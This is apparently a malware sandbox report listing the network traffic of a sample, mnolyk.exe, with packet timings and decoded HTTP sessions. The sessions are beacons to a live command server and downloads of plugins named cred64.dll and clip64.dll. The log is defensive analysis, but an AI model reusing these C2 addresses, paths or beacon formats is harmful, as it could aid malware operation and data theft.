                                                                      Feb 6, 2023 18:38:39.518759966 CET5032780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.521410942 CET805032862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.524363995 CET5032880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.535774946 CET5032880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.601021051 CET805032862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.604188919 CET805032862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.608333111 CET5032880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.721338987 CET5032880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.722290039 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.782444954 CET805032962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.782581091 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.784251928 CET805032862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.784394026 CET5032880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.784785032 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.844588041 CET805032962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.848402023 CET805032962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:39.848593950 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.957117081 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:39.958293915 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.016493082 CET805032962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.016714096 CET5032980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.018873930 CET805033062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.019131899 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.019565105 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.079741955 CET805033062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.085058928 CET805033062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.085231066 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.189758062 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.190673113 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.251538992 CET805033062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.252073050 CET5033080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.253690004 CET805033162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.253813982 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.257821083 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.320513964 CET805033162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.322891951 CET805033162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.323050022 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.441922903 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.445924997 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.502518892 CET805033162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.502630949 CET5033180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.508131027 CET805033262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.508280993 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.516329050 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.578907013 CET805033262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.580770016 CET805033262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.580889940 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.691934109 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.692740917 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.753937006 CET805033262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.754015923 CET5033280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.754369020 CET805033362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.754462957 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.754988909 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.816451073 CET805033362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.820499897 CET805033362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:40.820622921 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.941492081 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:40.942447901 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.003031015 CET805033462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.003062010 CET805033362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.003148079 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.003222942 CET5033380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.003923893 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.066742897 CET805033462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.070502996 CET805033462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.070583105 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.176450968 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.177633047 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.237185955 CET805033462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.237313032 CET5033480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.239296913 CET805033562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.239454031 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.243352890 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.304913044 CET805033562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.308324099 CET805033562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.308482885 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.425282955 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.425344944 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.486093044 CET805033662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.486244917 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.486984015 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.487148046 CET805033562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.487560034 CET5033580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.547377110 CET805033662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.549911976 CET805033662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.550013065 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.658651114 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.659615040 CET5033780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.719324112 CET805033662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.719477892 CET5033680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.721211910 CET805033762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.721380949 CET5033780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.721827984 CET5033780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.783286095 CET805033762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.788013935 CET805033762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:41.792634964 CET5033780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:41.908777952 CET5033780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.425873995 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.427228928 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.487093925 CET805036462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.487282991 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.488315105 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.489289999 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.493705034 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.555087090 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.557642937 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.561353922 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.675569057 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.676603079 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.736437082 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.736641884 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.739053965 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.739289999 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.739823103 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.802825928 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.806164980 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.806390047 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.909356117 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.910228968 CET5036780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.970899105 CET805036762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.971005917 CET5036780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.971847057 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.971935034 CET5036680192.168.2.762.204.41.4
                                                                      • 62.204.41.4
                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      0  192.168.2.7  49724  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:35:56.006951094 CET  336  OUT  GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 6, 2023 18:35:56.069925070 CET  337  IN  HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 162
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      1  192.168.2.7  49725  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:35:56.007021904 CET  337  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.075514078 CET  337  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0
                                                                      Feb 6, 2023 18:35:56.099328995 CET  338  OUT  GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 6, 2023 18:35:56.161401987 CET  339  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 91136
                                                                      Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "63dd4219-16400"
                                                                      Accept-Ranges: bytes
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      10  192.168.2.7  49734  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:00.024734020 CET  442  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.093935013 CET  442  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      100  192.168.2.7  49825  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:23.646591902 CET  538  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.710850954 CET  539  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      101  192.168.2.7  49826  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:23.882734060 CET  539  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.947952032 CET  540  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      102  192.168.2.7  49827  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:24.116180897 CET  540  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.180759907 CET  541  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      103  192.168.2.7  49828  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:24.349766970 CET  541  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.414799929 CET  542  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      104  192.168.2.7  49829  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:24.582432032 CET  542  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.644867897 CET | 543 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      105 | 192.168.2.7 | 49830 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:24.829107046 CET | 543 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.891784906 CET | 544 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      106 | 192.168.2.7 | 49831 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:25.110774040 CET | 544 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.174256086 CET | 545 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      107 | 192.168.2.7 | 49832 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:25.351768970 CET | 545 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.414864063 CET | 546 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      108 | 192.168.2.7 | 49833 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:25.603473902 CET | 546 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
